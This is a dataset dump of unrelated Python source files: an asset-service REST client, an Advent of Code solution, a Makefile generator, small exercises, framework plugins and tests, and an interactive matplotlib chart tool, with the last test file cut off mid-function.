content
stringlengths 5
1.05M
|
---|
import os
import json
import uuid
import logging
import requests
import predix.config
import predix.service
import predix.security.uaa
class Asset(object):
    """
    Client library for working with the Predix Asset Service. For more details
    on use of the service please see official docs:

    https://www.predix.io/services/service.html?id=1171
    """
    def __init__(self, uri=None, zone_id=None, *args, **kwargs):
        """
        :param uri: service endpoint; resolved from the environment when
            not given.
        :param zone_id: Predix-Zone-Id header value; resolved from the
            environment when not given.
        """
        super(Asset, self).__init__(*args, **kwargs)
        self.uri = uri or self._get_uri()
        self.zone_id = zone_id or self._get_zone_id()
        self.service = predix.service.Service(self.zone_id)

    def _get_uri(self):
        """
        Returns the URI endpoint for an instance of the Asset
        service from environment inspection (Cloud Foundry VCAP_SERVICES
        when present, otherwise a predix.config environment variable).
        """
        if 'VCAP_SERVICES' in os.environ:
            services = json.loads(os.getenv('VCAP_SERVICES'))
            predix_asset = services['predix-asset'][0]['credentials']
            return predix_asset['uri']
        else:
            return predix.config.get_env_value(self, 'uri')

    def _get_zone_id(self):
        """
        Returns the Predix Zone Id for the service that is a required
        header in service calls.
        """
        if 'VCAP_SERVICES' in os.environ:
            services = json.loads(os.getenv('VCAP_SERVICES'))
            predix_asset = services['predix-asset'][0]['credentials']
            return predix_asset['zone']['http-header-value']
        else:
            return predix.config.get_env_value(self, 'zone_id')

    def authenticate_as_client(self, client_id, client_secret):
        """
        Will authenticate for the given client / secret.
        """
        self.service.uaa.authenticate(client_id, client_secret)

    def _get_collections(self):
        """
        Returns the names of all user-defined domain object collections with
        counts for number of domain objects contained in that collection.

        ..

            [ { "collection": "volcano", "count": 1 }, ... ]
        """
        return self.service._get(self.uri)

    def get_collections(self):
        """
        Returns a flat list of the names of collections in the asset
        service.

        ..

            ['wind-turbines', 'jet-engines']
        """
        return [result['collection'] for result in self._get_collections()]

    def get_collection(self, collection, filter=None, fields=None,
                       page_size=None):
        """
        Returns a specific collection from the asset service with
        the given collection endpoint (expected to start with '/').

        Supports passing through parameters such as...

        - filters such as "name=Vesuvius" following GEL spec
        - fields such as "uri,description" comma delimited
        - page_size such as "100" (the default)
        """
        params = {}
        if filter:
            params['filter'] = filter
        if fields:
            params['fields'] = fields
        if page_size:
            params['pageSize'] = page_size

        uri = self.uri + '/v1' + collection
        return self.service._get(uri, params=params)

    def create_guid(self, collection=None):
        """
        Returns a new guid for use in posting a new asset to a collection.
        When a collection is given, returns '<collection>/<guid>'.
        """
        guid = str(uuid.uuid4())
        if collection:
            return str.join('/', [collection, guid])
        else:
            return guid

    def post_collection(self, collection, body):
        """
        Creates a new collection. This is mostly just transport layer
        and passes collection and body along. It presumes the body
        already has generated ids.

        The collection is *not* expected to have the id.
        """
        assert isinstance(body, list), "POST requires body to be a list"
        assert collection.startswith('/'), "Collections must start with /"
        uri = self.uri + '/v1' + collection
        return self.service._post(uri, body)

    def put_collection(self, collection, body):
        """
        Updates an existing collection.

        The collection being updated *is* expected to include the id.
        """
        uri = self.uri + '/v1' + collection
        return self.service._put(uri, body)

    def delete_collection(self, collection):
        """
        Deletes an existing collection.

        The collection being deleted *is* expected to include the id.
        """
        # NOTE(review): unlike put/post this builds an unversioned URI
        # (no '/v1') — confirm the service accepts it.
        uri = str.join('/', [self.uri, collection])
        return self.service._delete(uri)

    def patch_collection(self, collection, changes):
        """
        Will make specific updates to a record based on JSON Patch
        documentation.

        https://tools.ietf.org/html/rfc6902

        the format of changes is something like::

            [{
                'op': 'add',
                'path': '/newfield',
                'value': 'just added'
            }]
        """
        # NOTE(review): unversioned URI here as well — confirm intended.
        uri = str.join('/', [self.uri, collection])
        return self.service._patch(uri, changes)

    def get_audit(self):
        """
        Return audit report for asset. Disabled by default.
        """
        return self.service._get(self.uri + '/v1/system/audit')

    def get_audit_changes(self):
        """
        Return change log for audit. Disabled by default.
        """
        return self.service._get(self.uri + '/v1/system/audit/changes')

    def get_audit_snapshots(self):
        """
        Return an audit snapshot. Disabled by default.
        """
        return self.service._get(self.uri + '/v1/system/audit/snapshots')

    def get_scripts(self):
        """
        Return any configured scripts for asset service.
        """
        return self.service._get(self.uri + '/v1/system/scripts')

    def get_messages(self):
        """
        Return any system messages related to asset systems.
        """
        return self.service._get(self.uri + '/v1/system/messages')

    def get_configs(self):
        """
        Return the configuration for the asset service.
        """
        return self.service._get(self.uri + '/v1/system/configs')

    def get_triggers(self):
        """
        Return configured triggers in the asset system.
        """
        return self.service._get(self.uri + '/v1/system/triggers')

    def save(self, collection):
        """
        Save an asset collection to the service.
        """
        # Fixed: the original asserted against predix.data.asset.AssetCollection,
        # but predix.data is never imported; AssetCollection is defined in
        # this module.
        assert isinstance(collection, AssetCollection), "Expected AssetCollection"
        collection.validate()
        self.put_collection(collection.uri, collection.__dict__)
class AssetCollection(object):
    """
    User Defined Domain Objects are the customizable collections to represent
    data in the Asset Service.

    This is experimental to provide a base class for a sort of ORM between
    domain objects to marshall and unmarshall between Python and the REST
    endpoints.
    """
    def __init__(self, parent=None, guid=None, *args, **kwargs):
        super(AssetCollection, self).__init__(*args, **kwargs)
        # Every instance gets a guid; one is generated when not supplied.
        guid = guid or str(uuid.uuid4())
        # Naming the collection after the class name keeps us within safe
        # URI naming rules.  The service allows no more than two forward
        # slashes in a uri, so collections cannot nest deeper than one level.
        self.uri = '/{0}/{1}'.format(self.get_collection(), guid)

    def __repr__(self):
        return json.dumps(self.__dict__)

    # str() and repr() intentionally render the same JSON payload.
    __str__ = __repr__

    def get_collection(self):
        """Collection name derived from the concrete class name."""
        return self.__class__.__name__.lower()

    def validate(self):
        """
        If an asset collection wants any client-side validation the
        object can override this method and it is called anytime
        we're saving.
        """
        return
|
from typing import List, Tuple
from collections import defaultdict
BASE_PATH = "../../inputs/day03"
def solution_1(binary_lines: List[str]) -> int:
    """Power consumption: gamma (most common bit per column) multiplied by
    epsilon (least common bit per column), both read as binary numbers.

    On a tie the gamma bit is '0' and the epsilon bit is '1'.
    """
    width = len(binary_lines[0])
    column_counts = [defaultdict(int) for _ in range(width)]
    for line in binary_lines:
        for position, bit in enumerate(line):
            column_counts[position][bit] += 1
    gamma_bits = []
    epsilon_bits = []
    for counts in column_counts:
        if counts['0'] < counts['1']:
            gamma_bits.append('1')
            epsilon_bits.append('0')
        else:
            gamma_bits.append('0')
            epsilon_bits.append('1')
    return int(''.join(gamma_bits), 2) * int(''.join(epsilon_bits), 2)
def filter_lines(lines: List[str], oxigen_criteria: bool) -> int:
    """Repeatedly keep only the lines matching the bit criteria at each
    position until a single line remains; return it as an integer.

    With oxigen_criteria=True keep the most common bit (ties keep '1');
    otherwise keep the least common bit (ties keep '0').
    """
    index = 0
    while len(lines) > 1 and index < len(lines[0]):
        buckets = {"0": [], "1": []}
        for line in lines:
            buckets[line[index]].append(line)
        majority_is_one = len(buckets["1"]) >= len(buckets["0"])
        if oxigen_criteria:
            keep = "1" if majority_is_one else "0"
        else:
            keep = "0" if majority_is_one else "1"
        lines = buckets[keep]
        index += 1
    return int(lines[0], 2)
def solution_2(binary_lines) -> int:
    """Life support rating: oxygen generator rating times CO2 scrubber
    rating, each obtained by filter_lines with the matching criteria."""
    oxygen_rating = filter_lines(binary_lines, True)
    co2_rating = filter_lines(binary_lines, False)
    return oxygen_rating * co2_rating
# Run both puzzle parts against the sample input and the real input file.
for file_name in ["test.txt", "sol.txt"]:
    with open(f"{BASE_PATH}/{file_name}") as f:
        # One binary string per line; strip trailing newlines.
        lines = [l.strip() for l in f]
    print(f"Solutions for {file_name}:")
    sol1 = solution_1(lines)
    print(f"Part 1: {sol1}")
    sol2 = solution_2(lines)
    print(f"Part 2: {sol2}")
|
###############################################################################
# FIRESTARTER - A Processor Stress Test Utility
# Copyright (C) 2017 TU Dresden, Center for Information Services and High
# Performance Computing
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact: [email protected]
###############################################################################
def target_all(file, targets):
    """Write the Makefile 'all' target listing *targets* to *file*."""
    file.write("all: %s\n" % (targets,))
def src_obj_files(file, templates, version):
    """Write Makefile variables listing the assembler-function source and
    object files for *templates*.

    Win64 variants are only emitted when version.enable_win64 is set.
    The original generator prepended each entry, so lists are written in
    reverse template order with a trailing space — preserved here.
    """
    ordered = list(templates)[::-1]
    src_files = ''.join(t.file + '.c ' for t in ordered)
    obj_files = ''.join(t.file + '.o ' for t in ordered)
    win_templates = [t for t in ordered if t.win64_incl == 1]
    src_files_win = ''.join(t.file + '.c ' for t in win_templates)
    obj_files_win = ''.join(t.file + '_win64.o ' for t in win_templates)
    file.write("ASM_FUNCTION_SRC_FILES=" + src_files + "\n")
    file.write("ASM_FUNCTION_OBJ_FILES=" + obj_files + "\n")
    if version.enable_win64 == 1:
        file.write("ASM_FUNCTION_SRC_FILES_WIN=" + src_files_win + "\n")
        file.write("ASM_FUNCTION_OBJ_FILES_WIN=" + obj_files_win + "\n")
def template_rules(file, templates, version):
    """Write per-template compile rules, plus Win64 variants when both the
    build and the template enable them.

    Flags were accumulated by prepending in the original, so they appear
    in reverse declaration order with a trailing space — preserved here.
    """
    for template in templates:
        flags = ''.join(f + ' ' for f in reversed(template.flags))
        file.write(template.file + ".o: " + template.file + ".c\n")
        file.write("\t${LINUX_CC} ${OPT_ASM} ${LINUX_C_FLAGS} " + flags + " -c " + template.file + ".c\n\n")
        if (version.enable_win64 == 1) and (template.win64_incl == 1):
            file.write(template.file + "_win64.o: " + template.file + ".c\n")
            file.write("\t${WIN64_CC} ${OPT_ASM} ${WIN64_C_FLAGS} " + flags + " -c " + template.file + ".c -o " + template.file + "_win64.o\n\n")
|
# Redo challenge 035 (triangles), additionally reporting which kind of
# triangle the three sides form:
# - Equilateral
# - Isosceles
# - Scalene
a = int(input('Lado A: '))
b = int(input('Lado B: '))
c = int(input('Lado C: '))
# Triangle inequality check.  NOTE(review): using >= admits degenerate
# (zero-area) triangles where one side equals the sum of the other two —
# confirm that is intended (the classic check uses strict >).
if a + b >= c and a + c >= b and b + c >= a:
    if a == b == c:
        # All three sides equal.
        print('\nTriângulo equilátero!')
    elif a != b != c != a:
        # All three sides different.
        print('\nTriângulo escaleno!')
    else:
        # Exactly two sides equal.
        print('\nTriângulo isósceles!')
else:
    print('\nOs lados digitados NÃO formam um triângulo!')
import pandas as pd
from reamber.o2jam.O2JHold import O2JHold
from tests.test.o2jam.test_fixture import o2j_mapset
def test_type(o2j_mapset):
    # The first map of the fixture should expose its holds as O2JHold.
    assert isinstance(o2j_mapset[0].holds[0], O2JHold)
def test_from_series():
    # A hold built via from_series should equal one built directly —
    # presumably positional args are (offset, column, length, volume, pan),
    # matching the Series keys (confirm against O2JHold's signature).
    hold = O2JHold.from_series(pd.Series(dict(offset=1000, column=1, length=1000, volume=2, pan=3)))
    assert O2JHold(1000, 1, 1000, 2, 3) == hold
|
# encoding: utf-8
from ckan.common import CKANConfig
import ckan.plugins as plugins
import ckan.plugins.toolkit as toolkit
def most_popular_groups():
    '''Return a sorted list of the groups with the most datasets.'''
    # Ask CKAN for every group on the site, sorted by dataset count with
    # all fields populated, then keep only the ten most popular.
    all_groups = toolkit.get_action('group_list')(
        {}, {'sort': 'package_count desc', 'all_fields': True})
    return all_groups[:10]
class ExampleThemePlugin(plugins.SingletonPlugin):
    '''An example theme plugin.

    '''
    # Declare the CKAN plugin interfaces this class implements.
    plugins.implements(plugins.IConfigurer)
    # Declare that this plugin will implement ITemplateHelpers.
    plugins.implements(plugins.ITemplateHelpers)

    def update_config(self, config: CKANConfig):
        # Add this plugin's templates dir to CKAN's extra_template_paths, so
        # that CKAN will use this plugin's custom templates.
        toolkit.add_template_directory(config, 'templates')

    def get_helpers(self):
        '''Register the most_popular_groups() function above as a template
        helper function.

        '''
        # Template helper function names should begin with the name of the
        # extension they belong to, to avoid clashing with functions from
        # other extensions.
        return {'example_theme_most_popular_groups': most_popular_groups}
|
# -*- coding: utf-8 -*-
"""
Created on Fri May 18 21:24:46 2018
@author: mai1346
"""
from Event import FillEvent
from abc import ABC, abstractmethod
class ExecutionHandler(ABC):
    """Abstract base class for order-execution handlers."""

    @abstractmethod
    def execute_order(self, event):
        """Process an order event; concrete handlers must override this."""
        raise NotImplementedError("Should implement execute_order()")
class SimulatedExecutionHandler(ExecutionHandler):
    '''
    Generates simulated FILL events.
    '''
    def __init__(self, events, data_handler):
        # events: queue the generated fill events are pushed onto (.put)
        # data_handler: supplies latest bar values per symbol
        self.events = events
        self.data_handler = data_handler

    def execute_order(self, orderevent):
        # Convert an ORDER event directly into a fill at the latest close
        # price — no latency, slippage or partial fills are simulated.
        if orderevent.type == 'ORDER':
            fill_event = FillEvent(
                orderevent.datetime, orderevent.symbol,
                'Test_Exchange', orderevent.quantity, orderevent.direction, orderevent.order_type,
                self.data_handler.get_latest_bars_values(orderevent.symbol, "close")[0]  # [0] because it's a np array
            )
            self.events.put(fill_event)
__author__ = 'pzdeb'
|
from django.contrib import admin

from .models import EmailTemplate

# Expose EmailTemplate in the Django admin with the default ModelAdmin.
admin.site.register(EmailTemplate)
|
import json
class UserNotInFile(Exception):
    """Raised when a user id is not present in the points file."""
class JF():
    """Tiny JSON-file-backed points store keyed by user id.

    Keys are stored as strings; values are point totals clamped at 0.
    """

    def __init__(self, jsonfile):
        """:param jsonfile: path of the JSON file holding {user_id: points}."""
        self.file = jsonfile

    def __write(self, data):
        # Rewrite the whole file; indent for human-readable diffs.
        with open(self.file, "w") as f:
            json.dump(data, f, indent=4)

    def __getall(self):
        # Load the complete mapping from disk.
        with open(self.file) as f:
            return json.load(f)

    def __user_in_file(self, userid):
        # Fixed: previously compared `.get(...) == None` (should be `is None`)
        # and shadowed the builtin `all`; a membership test is clearer.
        return str(userid) in self.__getall()

    def get_points(self, userid):
        """Return the stored points for userid, or 0 when unknown."""
        return self.__getall().get(str(userid), 0)

    def order(self):
        """Return (user_id, points) pairs sorted by points, highest first."""
        return sorted(self.__getall().items(), reverse=True, key=lambda item: item[1])

    def change_points(self, userid, points):
        """Add (or subtract) points for userid, clamping the total at 0.

        Unknown users are created; a non-positive delta for a new user
        stores 0.  Fixed: the original re-read the file up to three times
        per call — now the mapping is loaded once and written once.
        """
        key = str(userid)
        data = self.__getall()
        data[key] = max(0, data.get(key, 0) + points)
        self.__write(data)
if __name__ == '__main__':
    # Ad-hoc smoke run: print the leaderboard from the local points file.
    x = JF("points.json").order()
    print(x)
import matplotlib.pyplot as plt
import random
import time
import pandas as pd
import colorama
import os
import sys
import requests
import platform
import math
from bs4 import BeautifulSoup as soup
from colorama import Fore
import numpy as np
wi="\033[1;37m" #>>White#
rd="\033[1;31m" #>Red #
gr="\033[1;32m" #>Green #
yl="\033[1;33m" #>Yellow#
#data = {
#"calories": [420, 380, 390],
#"duration": [50, 40, 45]
#}
#load data into a DataFrame object:
#df = pd.DataFrame(data)
#print(df)
#
#Country = ['USA','Canada','Germany','UK','France']
#GDP_Per_Capita = [45000,42000,52000,49000,47000]
#plt.bar(Country, GDP_Per_Capita)
#plt.title('Country Vs GDP Per Capita')
#plt.xlabel('Country')
#plt.ylabel('GDP Per Capita')
#plt.show()
# NOTE(review): this rebinds the name of the imported `sys` module to the
# platform name string (used in the prompt below); the sys module becomes
# unusable after this line — rename this variable if sys is ever needed.
sys = platform.system()
def banner():
    """Print the tool's ASCII-art banner and a one-line description."""
    print(Fore.CYAN + '''
 ███████████                    █████                          █████
░░███░░░░░███                  ░░███                          ░░███
 ░███    ░███ █████ ████  ██████ ░███████   ██████  ████████  ███████
 ░██████████ ░░███ ░███  ███░░███ ░███░░███ ░░░░░███ ░░███░░███░░░███░
 ░███░░░░░░   ░███ ░███ ░███ ░░░ ░███ ░███  ███████  ░███ ░░░   ░███
 ░███         ░███ ░███ ░███  ███ ░███ ░███ ███░░███  ░███      ░███ ███
 █████        ░░███████ ░░██████  ████ █████░░████████ █████     ░░█████
░░░░░          ░░░░░███  ░░░░░░  ░░░░ ░░░░░  ░░░░░░░░ ░░░░░       ░░░░░
               ███ ░███
''')
    print(wi + rd + "Tool that can generate charts, using the module matplotlib")
def random():
    """Interactively build one of four demo charts (histogram, line,
    scatter, donut pie) from randomly generated data and show it.

    NOTE(review): this function shadows the `random` module imported at
    the top of the file — consider renaming.
    """
    print(wi + yl + 'Bar=0, Line=1, scatter=2, pie=3')
    commandhere = input("Choose Graph Type: ")
    if commandhere == "1":
        # Line chart: phase-shifted sine waves, one per prop-cycle color.
        title = input("Title Of Graph: ")
        label1 = input("Input 2 Titles: ")
        label2 = input("Input 1 More Title: ")
        plt.style.use('dark_background')
        fig, ax = plt.subplots()
        L = 6
        x = np.linspace(0, L)
        ncolors = len(plt.rcParams['axes.prop_cycle'])
        shift = np.linspace(0, L, ncolors, endpoint=False)
        for s in shift:
            ax.plot(x, np.sin(x + s), 'o-')
        ax.set_xlabel(label1)
        ax.set_ylabel(label2)
        ax.set_title(title)
        plt.show()
    elif commandhere == "0":
        # Histograms: four subplot styles over normally distributed data.
        title1 = input("Input Title For stepfilled Graph: ")
        title2 = input("Input Title For step Graph: ")
        title3 = input("Input Title For barstacked Graph: ")
        title4 = input("Input Title For unequal bins Graph: ")
        np.random.seed(19680801)  # fixed seed so the demo is reproducible
        mu_x = 200
        sigma_x = 25
        x = np.random.normal(mu_x, sigma_x, size=100)
        mu_w = 200
        sigma_w = 10
        w = np.random.normal(mu_w, sigma_w, size=100)
        fig, axs = plt.subplots(nrows=2, ncols=2)
        axs[0, 0].hist(x, 20, density=True, histtype='stepfilled', facecolor='g',
                       alpha=0.75)
        axs[0, 0].set_title(title1)
        axs[0, 1].hist(x, 20, density=True, histtype='step', facecolor='g',
                       alpha=0.75)
        axs[0, 1].set_title(title2)
        axs[1, 0].hist(x, density=True, histtype='barstacked', rwidth=0.8)
        axs[1, 0].hist(w, density=True, histtype='barstacked', rwidth=0.8)
        axs[1, 0].set_title(title3)
        # Create a histogram by providing the bin edges (unequally spaced).
        bins = [100, 150, 180, 195, 205, 220, 250, 300]
        axs[1, 1].hist(x, bins, density=True, histtype='bar', rwidth=0.8)
        axs[1, 1].set_title(title4)
        fig.tight_layout()
        plt.show()
    elif commandhere == "2":
        # Scatter: three colored point clouds with random sizes.
        np.random.seed(19680801)
        fig, ax = plt.subplots()
        for color in ['tab:blue', 'tab:orange', 'tab:green']:
            n = 750
            x, y = np.random.rand(2, n)
            scale = 200.0 * np.random.rand(n)
            ax.scatter(x, y, c=color, s=scale, label=color,
                       alpha=0.3, edgecolors='none')
        ax.legend()
        ax.grid(True)
        plt.show()
    elif commandhere == "3":
        # Donut pie with annotated wedges (matplotlib gallery example).
        fig, ax = plt.subplots(figsize=(6, 3), subplot_kw=dict(aspect="equal"))
        recipe = ["225 g flour",
                  "90 g sugar",
                  "1 egg",
                  "60 g butter",
                  "100 ml milk",
                  "1/2 package of yeast"]
        data = [225, 90, 50, 60, 100, 5]
        wedges, texts = ax.pie(data, wedgeprops=dict(width=0.5), startangle=-40)
        bbox_props = dict(boxstyle="square,pad=0.3", fc="w", ec="k", lw=0.72)
        kw = dict(arrowprops=dict(arrowstyle="-"),
                  bbox=bbox_props, zorder=0, va="center")
        for i, p in enumerate(wedges):
            # Annotate each wedge at its angular midpoint, label placed
            # outside on the side the wedge points to.
            ang = (p.theta2 - p.theta1) / 2. + p.theta1
            y = np.sin(np.deg2rad(ang))
            x = np.cos(np.deg2rad(ang))
            horizontalalignment = {-1: "right", 1: "left"}[int(np.sign(x))]
            connectionstyle = "angle,angleA=0,angleB={}".format(ang)
            kw["arrowprops"].update({"connectionstyle": connectionstyle})
            ax.annotate(recipe[i], xy=(x, y), xytext=(1.35 * np.sign(x), 1.4 * y),
                        horizontalalignment=horizontalalignment, **kw)
        ax.set_title("Matplotlib bakery: A donut")
        plt.show()
def update():
    """Best-effort update check: fetch the GitHub project page and look
    for the literal relative timestamp "19 hours ago".

    NOTE(review): extremely brittle — GitHub's relative timestamps change
    constantly, so this will almost always report a new commit.
    """
    url = 'https://github.com/FonderElite/chartgen'
    r = requests.get(url)
    soupi = soup(r.content, "html.parser")
    # font = soup.find("b", text="Past Movies:").find_next_sibling("font")
    dte = soupi.find(text="19 hours ago")
    print("Checking last commit date...")
    time.sleep(2)
    if dte != "19 hours ago":
        print("New Commit! kindly check:https://github.com/FonderElite/chartgen")
    else:
        print(rd + "No recent commits.")
def help():
    """Print the usage/command reference.

    NOTE(review): shadows the builtin help() for the rest of the program.
    """
    print(yl + '''
=============================================
+|        Chart-Gen By Fonder-Elite        |+
+|-----------------------------------------|+
+| -h Help                                 |+
+| -c chart                                |+
+| -r random                               |+
+| -s Start                                |+
+| -u Update                               |+
+| -q Quit                                 |+
+|Ex. ./chartgen -c -s (Generate Chart)    |+
+|Ex. ./chartgen -c -r -s (Random Chart)   |+
+|=========================================|+
''')
# Start-up sequence: banner, short pause, usage text, then a best-effort
# check that the required third-party modules are importable.
banner()
time.sleep(2)
help()
try:
    import matplotlib
    import bs4
    import requests
    import colorama
except Exception:
    print(Fore.CYAN + "Missing Modules.")
    # NOTE(review): only matplotlib is installed here even though bs4,
    # requests and colorama were also checked — confirm intended.
    os.system('pip install matplotlib')
def chartgen():
    """Interactively prompt for four labels and four values, then draw the
    chosen chart type (bar, line, scatter or pie).

    NOTE(review): the entered values are kept as strings, so numeric axes
    are treated categorically (in input order) rather than by magnitude.
    """
    graphs = ["bar","line","scatter","pie"]  # NOTE(review): unused
    print('Bar=0, Line=1, scatter=2, pie=3')
    datatype = input("Choose Graph Type: ")
    if datatype == "0":
        # Bar chart from the four label/value pairs.
        title = input("Title Of Graph: ")
        letters = input('Input 4 Titles: ')
        letters2 = input("Input 3 More Titles:")
        letters3 = input("Input 2 More Titles:")
        letters4 = input("Input 1 More Title:")
        numbers = input("Input 4 Values: ")
        numbers2 = input("Input 3 More Values: ")
        numbers3 = input("Input 2 More Values: ")
        numbers4 = input("Input 1 More Values: ")
        arr = [letters,letters2,letters3,letters4]
        numbersarr = [numbers,numbers2,numbers3,numbers4]
        plt.bar(arr, numbersarr)
        plt.title(title)
        plt.xlabel(arr)
        plt.ylabel(numbers)
        plt.show()
    elif datatype == "1":
        # Line chart over the same four label/value pairs.
        title = input("Title Of Graph: ")
        letters = input('Input 4 Titles: ')
        letters2 = input("Input 3 More Titles:")
        letters3 = input("Input 2 More Titles:")
        letters4 = input("Input 1 More Title:")
        numbers = input("Input 4 Values: ")
        numbers2 = input("Input 3 More Values: ")
        numbers3 = input("Input 2 More Values: ")
        numbers4 = input("Input 1 More Values: ")
        arr = [letters, letters2, letters3, letters4]
        numbersarr = [numbers, numbers2, numbers3, numbers4]
        fig, ax = plt.subplots()
        ax.plot(arr, numbersarr)
        ax.set(xlabel=arr, ylabel=numbersarr,
               title=title)
        ax.grid()
        plt.show()
    elif datatype == "2":
        # Scatter plot of the label/value pairs.
        title = input("Title Of Graph: ")
        letters = input('Input 4 Titles: ')
        letters2 = input("Input 3 More Titles:")
        letters3 = input("Input 2 More Titles:")
        letters4 = input("Input 1 More Title:")
        numbers = input("Input 4 Values: ")
        numbers2 = input("Input 3 More Values: ")
        numbers3 = input("Input 2 More Values: ")
        numbers4 = input("Input 1 More Values: ")
        arr = [letters, letters2, letters3, letters4]
        numbersarr = [numbers, numbers2, numbers3, numbers4]
        x = np.arange(0, math.pi * 2, 0.05)  # NOTE(review): x and y unused
        y = np.sin(x)
        plt.scatter(arr,numbersarr)
        plt.xlabel(arr)
        plt.ylabel(numbersarr)
        plt.title(title)
        plt.show()
    elif datatype == "3":
        # Pie chart of the four values labelled by the four titles.
        title = input("Title Of Graph: ")
        letters = input('Input 4 Titles: ')
        letters2 = input("Input 3 More Titles:")
        letters3 = input("Input 2 More Titles:")
        letters4 = input("Input 1 More Title:")
        numbers = input("Input 4 Values: ")
        numbers2 = input("Input 3 More Values: ")
        numbers3 = input("Input 2 More Values: ")
        numbers4 = input("Input 1 More Values: ")
        arr = [letters, letters2, letters3, letters4]
        numbersarr = [numbers, numbers2, numbers3, numbers4]
        fig = plt.figure()
        ax = fig.add_axes([0, 0, 1, 1])
        ax.axis('equal')
        langs = ['C', 'C++', 'Java', 'Python', 'PHP']  # NOTE(review): unused
        students = [23, 17, 35, 29, 12]  # NOTE(review): unused
        ax.pie(numbersarr, labels=arr, autopct='%1.2f%%')
        plt.title(title)
        plt.show()
# Interactive command shell: dispatch chartgen-style commands until the
# process is killed.  `sys` here is the platform name string bound above.
while True:
    command = input(wi + sys + '-User: ')
    if command == './chartgen':
        help()
    elif command == "./chartgen -h":
        help()
    elif command == "./chartgen -u":
        update()
    elif command == "./chartgen -c -s":
        chartgen()
    elif command == "./chartgen -c -r -s":
        random()
    else:
        # Unknown command: show the error art.
        print(Fore.RED + '''
 ___  __   __   __   __
|__  |__) |__) /  \ |__)
|___ |  \ |  \ \__/ |  \ ''')
        print(Fore.BLUE + '''
        __n__n__
 .------`-/00/-'
/  ##  ## (oo) Woops.
/ \## __   ./
   |//YY  \|/
   |||   ||| \|/
''')
|
from cortexpy.graph.interactor import Interactor
from cortexpy.test.builder.graph.cortex import (
CortexGraphBuilder,
get_cortex_builder,
LinksBuilder,
)
class TestCortex(object):
    """Simple-path traversal over single- and multi-color cortex graphs."""

    def test_emits_one_single_color_unitig(self):
        # given: one edge in one color
        b = CortexGraphBuilder()
        b.with_colors(0)
        b.add_edge('AAA', 'AAT', color=0)
        b.make_consistent('AAA')
        graph = b.build()

        # when
        paths = list(Interactor(graph).all_simple_paths())

        # then
        assert ['AAAT'] == [str(p.seq) for p in paths]

    def test_only_follows_one_color_with_color_specified(self):
        # given: two edges in different colors
        b = CortexGraphBuilder()
        b.with_colors(0, 1)
        b.add_edge('AAA', 'AAT', color=0)
        b.add_edge('AAT', 'ATA', color=1)
        b.make_consistent('AAA')
        graph = b.build()

        # when: traversal restricted to color 0
        paths = list(Interactor(graph).keep_color(0).all_simple_paths())

        # then: the color-1 edge is not followed
        assert ['AAAT'] == [str(p.seq) for p in paths]

    def test_follows_two_colors_with_no_color_specified(self):
        # given
        b = CortexGraphBuilder()
        b.with_colors(0, 1)
        b.add_edge('AAA', 'AAT', color=0)
        b.add_edge('AAT', 'ATA', color=1)
        b.make_consistent('AAA')
        graph = b.build()

        # when: no color restriction, so edges of both colors are followed
        paths = list(Interactor(graph).all_simple_paths())

        # then
        assert {'AAATA'} == set([str(p.seq) for p in paths])

    def test_follows_three_colors_with_no_color_specified(self):
        # given: a branch at AAT, one branch per extra color
        b = CortexGraphBuilder()
        b.with_colors(0, 1, 2)
        b.add_edge('AAA', 'AAT', color=0)
        b.add_edge('AAT', 'ATA', color=1)
        b.add_edge('AAT', 'ATC', color=2)
        b.make_consistent('AAA')
        graph = b.build()

        # when
        paths = list(Interactor(graph).all_simple_paths())

        # then: one path per branch
        assert {'AAATA', 'AAATC'} == set([str(p.seq) for p in paths])

    def test_in_y_graph_finds_two_paths(self):
        # given: a Y-shaped graph merging into AAA
        b = CortexGraphBuilder()
        b.add_path('CAA', 'AAA')
        b.add_path('TAA', 'AAA')
        b.make_consistent('AAA')
        cdb = b.build()

        # when
        paths = list(Interactor(cdb).all_simple_paths())

        # then
        assert {'CAAA', 'TAAA'} == set([str(p.seq) for p in paths])

    def test_in_y_graph_finds_two_paths_of_revcomp(self):
        # given: raw kmer records with edge descriptors
        b = get_cortex_builder()
        b.with_kmer('CGC 1 .......T')
        b.with_kmer('AGC 1 a....CG.')
        b.with_kmer('AAG 1 .....C..')
        b.with_kmer('GCC 1 a.......')
        cdb = b.build()
        cdb = Interactor(cdb).make_graph_nodes_consistent(['AAG']).graph

        # when
        paths = list(Interactor(cdb).all_simple_paths())

        # then
        assert ['AAGCC', 'AAGCG'] == sorted([str(p.seq) for p in paths])
class TestLinks:
    """Simple-path traversal constrained by link records."""

    def test_with_link_for_y_graph_emits_one_path(self):
        # given: a Y graph plus a link choosing the C branch from AAA
        b = CortexGraphBuilder()
        b.with_kmer_size(3)
        b.add_path('AAA', 'AAC')
        b.add_path('AAA', 'AAT')
        b.make_consistent('AAA')
        cdb = b.build()
        links = LinksBuilder() \
            .with_link_for_kmer('F 1 1 C', 'AAA') \
            .build()

        # when
        paths = list(Interactor(cdb).all_simple_paths(links=links))

        # then: only the linked branch is emitted
        assert ['AAAC'] == [str(p.seq) for p in paths]

    def test_bubble_and_y_with_two_links_returns_two_transcripts(self):
        # given: links resolving both the bubble and the trailing Y
        links = LinksBuilder() \
            .with_link_for_kmer('F 2 1 CT', 'AAA') \
            .with_link_for_kmer('F 1 1 A', 'CCC') \
            .build()

        b = CortexGraphBuilder()
        b.with_kmer_size(3)
        b.add_path('AAA', 'AAC', 'ACC', 'CCC', 'CCA')
        b.add_path('AAA', 'AAG', 'AGC', 'GCC', 'CCC', 'CCT')
        b.make_consistent('AAA')
        cdb = b.build()

        # when
        paths = list(Interactor(cdb).all_simple_paths(links=links))

        # then
        assert ['AAACCCA', 'AAACCCT'] == sorted([str(p.seq) for p in paths])

    def test_bubble_and_y_with_two_links_returns_three_transcripts(self):
        # given: two links from AAA that disagree on the bubble branch
        links = LinksBuilder() \
            .with_link_for_kmer('F 2 1 CT', 'AAA') \
            .with_link_for_kmer('F 1 1 G', 'AAA') \
            .build()

        b = CortexGraphBuilder()
        b.with_kmer_size(3)
        b.add_path('AAA', 'AAC', 'ACC', 'CCC', 'CCA')
        b.add_path('AAA', 'AAG', 'AGC', 'GCC', 'CCC', 'CCT')
